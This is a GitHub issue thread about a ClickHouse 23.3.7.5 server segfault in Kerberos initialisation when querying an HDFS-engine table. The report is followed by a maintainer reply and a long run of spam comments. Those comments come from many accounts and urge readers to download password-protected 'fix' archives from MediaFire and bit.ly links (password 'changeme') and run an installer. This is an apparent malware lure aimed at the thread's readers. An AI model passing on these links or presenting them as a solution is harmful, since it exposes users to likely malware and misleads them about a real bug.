### ISSUE TITLE
Exception on client: Code: 32. DB::Exception: Attempt to read after eof: while receiving packet from localhost:9220. (ATTEMPT_TO_READ_AFTER_EOF)

### ISSUE THREAD

**Issue by lokeshmandhare** [ClickHouse/ClickHouse#68927]
> Please make sure that the version you're using is still supported (you can find the list [here](https://github.com/ClickHouse/ClickHouse/blob/master/SECURITY.md#scope-and-supported-versions)).

> You have to provide the following information whenever possible.

**Company or project name**

Deepintent

**Describe what's wrong**

We added HDFS integration as described in clickhouse documentation [here](https://clickhouse.com/docs/en/engines/table-engines/integrations/hdfs#configuration) -  

The integration succeeded and we are able to connect to HDFS via clickhouse. We are also able to successfully create a table with HDFS engine. 

However after we run a simple select query, it crashes the client with following error - 

```
prod-ch1 :) select * from data.tmp_raw_audience_data_3 limit 1;

SELECT *
FROM data.tmp_raw_audience_data_3
LIMIT 1

Query id: 558d8c68-d447-405b-80f3-b2b01162d6d6

[prod-ch1] 2024.08.26 08:44:41.640870 [ 831905 ] <Fatal> BaseDaemon: ########################################
[prod-ch1] 2024.08.26 08:44:41.641432 [ 831905 ] <Fatal> BaseDaemon: (version 23.3.7.5 (official build), build id: 259938FF9CE8DE49ABC8C4BBD65FA8CCE4F929F6) (from thread 831317) (query_id: 558d8c68-d447-405b-80f3-b2b01162d6d6) (query: select * from planner.tmp_raw_audience_data_3 limit 1;) Received signal Segmentation fault (11)
[prod-ch1] 2024.08.26 08:44:41.641474 [ 831905 ] <Fatal> BaseDaemon: Address: NULL pointer. Access: read. Unknown si_code.
[prod-ch1] 2024.08.26 08:44:41.641505 [ 831905 ] <Fatal> BaseDaemon: Stack trace: 0x190694e9 0x1261bbbe 0x12617547 0x12462e7e 0x12463a1d 0x12453bef 0x12457b25 0x13f211a8 0x13847828 0x1383938d 0x1383870d 0x138cda56 0x138ce994 0x13bf4307 0x13bf18ad 0x149c554c 0x149dad59 0x179217d4 0x179229fb 0x17aaa287 0x17aa7cbd 0x7ffff77aa1ca 0x7ffff7416e73
[prod-ch1] 2024.08.26 08:44:41.641665 [ 831905 ] <Fatal> BaseDaemon: 2. krb5_free_cred_contents @ 0x190694e9 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641706 [ 831905 ] <Fatal> BaseDaemon: 3. ? @ 0x1261bbbe in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641766 [ 831905 ] <Fatal> BaseDaemon: 4. kerberosInit(String const&, String const&, String const&) @ 0x12617547 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641806 [ 831905 ] <Fatal> BaseDaemon: 5. DB::HDFSBuilderWrapper::runKinit() @ 0x12462e7e in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641836 [ 831905 ] <Fatal> BaseDaemon: 6. DB::createHDFSBuilder(String const&, Poco::Util::AbstractConfiguration const&) @ 0x12463a1d in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641871 [ 831905 ] <Fatal> BaseDaemon: 7. DB::HDFSSource::URISIterator::URISIterator(std::vector<String, std::allocator<String>> const&, std::shared_ptr<DB::Context const>) @ 0x12453bef in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641919 [ 831905 ] <Fatal> BaseDaemon: 8. DB::StorageHDFS::read(std::vector<String, std::allocator<String>> const&, std::shared_ptr<DB::StorageSnapshot> const&, DB::SelectQueryInfo&, std::shared_ptr<DB::Context const>, DB::QueryProcessingStage::Enum, unsigned long, unsigned long) @ 0x12457b25 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641975 [ 831905 ] <Fatal> BaseDaemon: 9. DB::IStorage::read(DB::QueryPlan&, std::vector<String, std::allocator<String>> const&, std::shared_ptr<DB::StorageSnapshot> const&, DB::SelectQueryInfo&, std::shared_ptr<DB::Context const>, DB::QueryProcessingStage::Enum, unsigned long, unsigned long) @ 0x13f211a8 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642030 [ 831905 ] <Fatal> BaseDaemon: 10. DB::InterpreterSelectQuery::executeFetchColumns(DB::QueryProcessingStage::Enum, DB::QueryPlan&) @ 0x13847828 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642061 [ 831905 ] <Fatal> BaseDaemon: 11. DB::InterpreterSelectQuery::executeImpl(DB::QueryPlan&, std::optional<DB::Pipe>) @ 0x1383938d in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642093 [ 831905 ] <Fatal> BaseDaemon: 12. DB::InterpreterSelectQuery::buildQueryPlan(DB::QueryPlan&) @ 0x1383870d in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642136 [ 831905 ] <Fatal> BaseDaemon: 13. DB::InterpreterSelectWithUnionQuery::buildQueryPlan(DB::QueryPlan&) @ 0x138cda56 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642162 [ 831905 ] <Fatal> BaseDaemon: 14. DB::InterpreterSelectWithUnionQuery::execute() @ 0x138ce994 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642185 [ 831905 ] <Fatal> BaseDaemon: 15. ? @ 0x13bf4307 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642209 [ 831905 ] <Fatal> BaseDaemon: 16. DB::executeQuery(String const&, std::shared_ptr<DB::Context>, bool, DB::QueryProcessingStage::Enum) @ 0x13bf18ad in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642239 [ 831905 ] <Fatal> BaseDaemon: 17. DB::TCPHandler::runImpl() @ 0x149c554c in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642263 [ 831905 ] <Fatal> BaseDaemon: 18. DB::TCPHandler::run() @ 0x149dad59 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642296 [ 831905 ] <Fatal> BaseDaemon: 19. Poco::Net::TCPServerConnection::start() @ 0x179217d4 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642318 [ 831905 ] <Fatal> BaseDaemon: 20. Poco::Net::TCPServerDispatcher::run() @ 0x179229fb in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642354 [ 831905 ] <Fatal> BaseDaemon: 21. Poco::PooledThread::run() @ 0x17aaa287 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642378 [ 831905 ] <Fatal> BaseDaemon: 22. Poco::ThreadImpl::runnableEntry(void*) @ 0x17aa7cbd in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642417 [ 831905 ] <Fatal> BaseDaemon: 23. start_thread @ 0x81ca in /usr/lib64/libpthread-2.28.so
[prod-ch1] 2024.08.26 08:44:41.642467 [ 831905 ] <Fatal> BaseDaemon: 24. clone @ 0x39e73 in /usr/lib64/libc-2.28.so
[prod-ch1] 2024.08.26 08:44:41.894512 [ 831905 ] <Fatal> BaseDaemon: Integrity check of the executable successfully passed (checksum: 55D1560E0294793C0B8F136BD404E6B7)
Exception on client:
Code: 32. DB::Exception: Attempt to read after eof: while receiving packet from localhost:9220. (ATTEMPT_TO_READ_AFTER_EOF)
```

Connecting to localhost:9220 as user clickhouse_admin.
Code: 210. DB::NetException: Connection refused (localhost:9220). (NETWORK_ERROR)

**Does it reproduce on the most recent release?**

[The list of releases](https://github.com/ClickHouse/ClickHouse/blob/master/utils/list-versions/version_date.tsv)

**Enable crash reporting**

> Change "enabled" to true in "send_crash_reports" section in `config.xml`:
```
<send_crash_reports>
        <!-- Changing <enabled> to true allows sending crash reports to -->
        <!-- the ClickHouse core developers team via Sentry https://sentry.io -->
        <enabled>false</enabled>
```

**How to reproduce**

* Which ClickHouse server version to use - version 23.3.7.5 
* Which interface to use, if it matters - Clickhouse client or datagrip
* Non-default settings, if any
* `CREATE TABLE` statements for all tables involved
```

CREATE TABLE db.tmp_raw_audience_data_3
(
    `providerSegmentId` String,
    `identity` String,
    `identityType` String,
    `npi` String
)
ENGINE = HDFS('hdfs://di/tmp/acc_custom_raw/73435254/', 'CSV')
```

* Sample data for all these tables, use [clickhouse-obfuscator](https://github.com/ClickHouse/ClickHouse/blob/master/programs/obfuscator/Obfuscator.cpp#L42-L80) if necessary
* Queries to run that lead to an unexpected result

**Expected behavior**

It should return the query result successfully with data from the table created with HDFS engine.

**Error message and/or stacktrace**

Query id: 558d8c68-d447-405b-80f3-b2b01162d6d6

[prod-ch1] 2024.08.26 08:44:41.640870 [ 831905 ] <Fatal> BaseDaemon: ########################################
[prod-ch1] 2024.08.26 08:44:41.641432 [ 831905 ] <Fatal> BaseDaemon: (version 23.3.7.5 (official build), build id: 259938FF9CE8DE49ABC8C4BBD65FA8CCE4F929F6) (from thread 831317) (query_id: 558d8c68-d447-405b-80f3-b2b01162d6d6) (query: select * from planner.tmp_raw_audience_data_3 limit 1;) Received signal Segmentation fault (11)
[prod-ch1] 2024.08.26 08:44:41.641474 [ 831905 ] <Fatal> BaseDaemon: Address: NULL pointer. Access: read. Unknown si_code.
[prod-ch1] 2024.08.26 08:44:41.641505 [ 831905 ] <Fatal> BaseDaemon: Stack trace: 0x190694e9 0x1261bbbe 0x12617547 0x12462e7e 0x12463a1d 0x12453bef 0x12457b25 0x13f211a8 0x13847828 0x1383938d 0x1383870d 0x138cda56 0x138ce994 0x13bf4307 0x13bf18ad 0x149c554c 0x149dad59 0x179217d4 0x179229fb 0x17aaa287 0x17aa7cbd 0x7ffff77aa1ca 0x7ffff7416e73
[prod-ch1] 2024.08.26 08:44:41.641665 [ 831905 ] <Fatal> BaseDaemon: 2. krb5_free_cred_contents @ 0x190694e9 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641706 [ 831905 ] <Fatal> BaseDaemon: 3. ? @ 0x1261bbbe in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641766 [ 831905 ] <Fatal> BaseDaemon: 4. kerberosInit(String const&, String const&, String const&) @ 0x12617547 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641806 [ 831905 ] <Fatal> BaseDaemon: 5. DB::HDFSBuilderWrapper::runKinit() @ 0x12462e7e in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641836 [ 831905 ] <Fatal> BaseDaemon: 6. DB::createHDFSBuilder(String const&, Poco::Util::AbstractConfiguration const&) @ 0x12463a1d in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641871 [ 831905 ] <Fatal> BaseDaemon: 7. DB::HDFSSource::URISIterator::URISIterator(std::vector<String, std::allocator<String>> const&, std::shared_ptr<DB::Context const>) @ 0x12453bef in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641919 [ 831905 ] <Fatal> BaseDaemon: 8. DB::StorageHDFS::read(std::vector<String, std::allocator<String>> const&, std::shared_ptr<DB::StorageSnapshot> const&, DB::SelectQueryInfo&, std::shared_ptr<DB::Context const>, DB::QueryProcessingStage::Enum, unsigned long, unsigned long) @ 0x12457b25 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.641975 [ 831905 ] <Fatal> BaseDaemon: 9. DB::IStorage::read(DB::QueryPlan&, std::vector<String, std::allocator<String>> const&, std::shared_ptr<DB::StorageSnapshot> const&, DB::SelectQueryInfo&, std::shared_ptr<DB::Context const>, DB::QueryProcessingStage::Enum, unsigned long, unsigned long) @ 0x13f211a8 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642030 [ 831905 ] <Fatal> BaseDaemon: 10. DB::InterpreterSelectQuery::executeFetchColumns(DB::QueryProcessingStage::Enum, DB::QueryPlan&) @ 0x13847828 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642061 [ 831905 ] <Fatal> BaseDaemon: 11. DB::InterpreterSelectQuery::executeImpl(DB::QueryPlan&, std::optional<DB::Pipe>) @ 0x1383938d in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642093 [ 831905 ] <Fatal> BaseDaemon: 12. DB::InterpreterSelectQuery::buildQueryPlan(DB::QueryPlan&) @ 0x1383870d in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642136 [ 831905 ] <Fatal> BaseDaemon: 13. DB::InterpreterSelectWithUnionQuery::buildQueryPlan(DB::QueryPlan&) @ 0x138cda56 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642162 [ 831905 ] <Fatal> BaseDaemon: 14. DB::InterpreterSelectWithUnionQuery::execute() @ 0x138ce994 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642185 [ 831905 ] <Fatal> BaseDaemon: 15. ? @ 0x13bf4307 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642209 [ 831905 ] <Fatal> BaseDaemon: 16. DB::executeQuery(String const&, std::shared_ptr<DB::Context>, bool, DB::QueryProcessingStage::Enum) @ 0x13bf18ad in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642239 [ 831905 ] <Fatal> BaseDaemon: 17. DB::TCPHandler::runImpl() @ 0x149c554c in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642263 [ 831905 ] <Fatal> BaseDaemon: 18. DB::TCPHandler::run() @ 0x149dad59 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642296 [ 831905 ] <Fatal> BaseDaemon: 19. Poco::Net::TCPServerConnection::start() @ 0x179217d4 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642318 [ 831905 ] <Fatal> BaseDaemon: 20. Poco::Net::TCPServerDispatcher::run() @ 0x179229fb in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642354 [ 831905 ] <Fatal> BaseDaemon: 21. Poco::PooledThread::run() @ 0x17aaa287 in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642378 [ 831905 ] <Fatal> BaseDaemon: 22. Poco::ThreadImpl::runnableEntry(void*) @ 0x17aa7cbd in /home/clickhouse/usr/bin/clickhouse-common-static-23.3.7.5/clickhouse
[prod-ch1] 2024.08.26 08:44:41.642417 [ 831905 ] <Fatal> BaseDaemon: 23. start_thread @ 0x81ca in /usr/lib64/libpthread-2.28.so
[prod-ch1] 2024.08.26 08:44:41.642467 [ 831905 ] <Fatal> BaseDaemon: 24. clone @ 0x39e73 in /usr/lib64/libc-2.28.so
[prod-ch1] 2024.08.26 08:44:41.894512 [ 831905 ] <Fatal> BaseDaemon: Integrity check of the executable successfully passed (checksum: 55D1560E0294793C0B8F136BD404E6B7)
Exception on client:
Code: 32. DB::Exception: Attempt to read after eof: while receiving packet from localhost:9220. (ATTEMPT_TO_READ_AFTER_EOF)
```

**Additional context**

> Add any other context about the problem here.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Algunenano** [comment]
`23.3.7.5` is not supported anymore. Please update to 24.8 and verify

**Comment by marcosj046** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
